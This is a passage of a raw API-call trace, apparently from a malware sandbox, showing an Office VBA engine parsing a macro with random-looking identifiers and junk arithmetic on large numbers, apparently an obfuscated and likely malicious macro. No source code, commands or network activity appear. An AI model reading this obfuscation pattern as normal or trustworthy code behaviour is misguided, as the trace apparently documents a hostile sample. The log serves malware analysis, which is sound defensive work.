lcid=0x409, szName="VB_Name") returned 0x10e2ff [0067.779] IMalloc:Alloc (This=0x7fefec05380, cb=0x8) returned 0x6a59890 [0067.779] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x258d2c0 [0067.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a59890, cbMultiByte=8, lpWideCharStr=0x258d2c0, cchWideChar=8 | out: lpWideCharStr="iAAB4Dx") returned 8 [0067.779] IMalloc:Free (This=0x7fefec05380, pv=0x6a59890) [0067.779] IMalloc:Free (This=0x7fefec05380, pv=0x258d2c0) [0067.779] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0067.780] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="IZDBQ4") returned 0x10a46a [0067.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x34d2b5a, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0067.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x34d2b5a, cbMultiByte=6, lpWideCharStr=0x6885818, cchWideChar=6 | out: lpWideCharStr="IZDBQ4") returned 6 [0067.780] IMalloc:Realloc (This=0x7fefec05380, pv=0x0, cb=0x30) returned 0x646f7b0 [0067.780] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x3a50000 [0067.780] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.780] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="HUoAQ4A") returned 0x104e6d [0067.781] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="K1AUwB") returned 0x1088b3 [0067.781] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.781] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AooUUDA") returned 0x1098fb [0067.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="166657454") returned 10 [0067.781] VarI4FromStr (in: strIn="166657454", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.782] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="vc1AQQ") returned 0x10fe7f [0067.782] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="bB4CcAD") returned 0x100f19 [0067.782] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="HABo1AAQ") returned 0x103090 [0067.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="229126659") returned 10 [0067.782] VarI4FromStr (in: strIn="229126659", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="871723279") returned 10 [0067.782] VarI4FromStr (in: strIn="871723279", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="744152178") returned 10 [0067.782] VarI4FromStr (in: strIn="744152178", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="751445714") returned 10 [0067.782] VarI4FromStr (in: strIn="751445714", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="369718703") returned 10 [0067.782] VarI4FromStr (in: strIn="369718703", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.782] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rDADAAZ") returned 0x103d81 [0067.783] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.783] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j1UQAAA") returned 0x101f33 [0067.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="345334324") returned 10 [0067.783] VarI4FromStr (in: strIn="345334324", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="605118741") returned 10 [0067.783] VarI4FromStr (in: strIn="605118741", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.783] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.783] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zBDABowB") returned 0x1005b0 [0067.783] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="908012061") returned 10 [0067.783] VarI4FromStr (in: strIn="908012061", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="176718505") returned 10 [0067.783] VarI4FromStr (in: strIn="176718505", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.783] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="867800412") returned 10 [0067.783] VarI4FromStr (in: strIn="867800412", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="159435008") returned 10 [0067.783] VarI4FromStr (in: strIn="159435008", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.784] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.784] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.784] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="773988887") returned 10 [0067.784] VarI4FromStr (in: strIn="773988887", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.784] IMalloc:Realloc (This=0x7fefec05380, pv=0xaf60bb0, cb=0x120) returned 0xaf59a40 [0067.784] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jA1AAA") returned 0x10c7fb [0067.784] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.784] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="626271690") returned 10 [0067.784] VarI4FromStr (in: strIn="626271690", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.784] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zAAZAA") returned 0x10132b [0067.784] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.784] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.785] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.785] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="iBAwQo") returned 0x10105b [0067.785] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="fQUoZxoA") returned 0x10f088 [0067.785] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.785] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="hwADBBUD") returned 0x10210d [0067.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="589448533") returned 10 [0067.785] VarI4FromStr (in: strIn="589448533", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.785] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RAwxAkAA") returned 0x109ed9 [0067.785] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="n4ABGck") returned 0x1077f3 [0067.785] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wA4QDQ1") returned 0x10aba6 [0067.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="237121252") returned 10 [0067.785] VarI4FromStr (in: strIn="237121252", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="984991603") returned 10 [0067.785] VarI4FromStr (in: strIn="984991603", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0067.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=9 | out: lpWideCharStr="50129568") returned 9 [0067.785] VarI4FromStr (in: strIn="50129568", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="829439565") returned 10 [0067.786] VarI4FromStr (in: strIn="829439565", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="174715579") returned 10 [0067.786] VarI4FromStr (in: strIn="174715579", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.786] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="z1UZoAo_") returned 0x1060be [0067.786] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.786] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="JoAoQX") returned 0x106a9b [0067.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="590588858") returned 10 [0067.786] VarI4FromStr (in: strIn="590588858", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="260975432") returned 10 [0067.786] VarI4FromStr (in: strIn="260975432", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.786] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.786] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="q_UDB_") returned 0x105c8b [0067.786] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="166904822") returned 10 [0067.786] VarI4FromStr (in: strIn="166904822", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="892765103") returned 10 [0067.786] VarI4FromStr (in: strIn="892765103", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.786] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="440703508") returned 10 [0067.787] VarI4FromStr (in: strIn="440703508", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="208463113") returned 10 [0067.787] VarI4FromStr (in: strIn="208463113", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.787] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="412832560") returned 10 [0067.787] VarI4FromStr (in: strIn="412832560", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.787] IMalloc:Realloc (This=0x7fefec05380, pv=0xaf59a40, cb=0x240) returned 0x6a18760 [0067.787] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rw11_AQ") returned 0x10abe5 [0067.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="594016844") returned 10 [0067.787] VarI4FromStr (in: strIn="594016844", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.787] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="d4_AU_A") returned 0x10ac66 [0067.787] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.787] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.787] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.787] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="dAAQAAC") returned 0x10a5a2 [0067.787] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="p1BABA1") returned 0x106481 [0067.787] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.787] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="XB_BA1") returned 0x1021a1 [0067.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="804664163") returned 10 [0067.788] VarI4FromStr (in: strIn="804664163", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.788] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RQBcBAx") returned 0x103607 [0067.788] VirtualAlloc (lpAddress=0x0, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0x3a60000 [0067.788] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="mGAAAXA") returned 0x10fcf0 [0067.788] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="dAD1kx") returned 0x1097a5 [0067.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="261161455") returned 10 [0067.788] VarI4FromStr (in: strIn="261161455", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="418949576") returned 10 [0067.788] VarI4FromStr (in: strIn="418949576", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="256728713") returned 10 [0067.789] VarI4FromStr (in: strIn="256728713", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0067.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=9 | out: lpWideCharStr="28372168") returned 9 [0067.789] VarI4FromStr (in: strIn="28372168", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="979527069") returned 10 [0067.789] VarI4FromStr (in: strIn="979527069", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.789] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lxD4AA") returned 0x107790 [0067.789] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.789] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BkABBAB") returned 0x107937 [0067.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="728813671") returned 10 [0067.789] VarI4FromStr (in: strIn="728813671", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="153013062") returned 10 [0067.789] VarI4FromStr (in: strIn="153013062", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) 